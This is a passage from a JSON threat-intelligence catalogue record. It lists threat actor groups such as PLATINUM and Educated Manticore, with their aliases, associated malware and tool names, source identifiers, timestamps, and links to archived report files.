				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "33f527a5-a5da-496a-a48c-7807cc858c3e",
			"created_at": "2022-10-25T15:50:23.803657Z",
			"updated_at": "2026-04-10T02:00:05.333523Z",
			"deleted_at": null,
			"main_name": "PLATINUM",
			"aliases": [
				"PLATINUM"
			],
			"source_name": "MITRE:PLATINUM",
			"tools": [
				"JPIN",
				"Dipsind",
				"adbupd"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1efe328c-7bda-49d8-82bf-852d220110ae",
			"created_at": "2026-01-22T02:00:03.661882Z",
			"updated_at": "2026-04-10T02:00:03.917703Z",
			"deleted_at": null,
			"main_name": "Educated Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Educated Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434957,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88e6c0507028884b56f837182b43f2648f5f0083.pdf",
		"text": "https://archive.orkl.eu/88e6c0507028884b56f837182b43f2648f5f0083.txt",
		"img": "https://archive.orkl.eu/88e6c0507028884b56f837182b43f2648f5f0083.jpg"
	}
}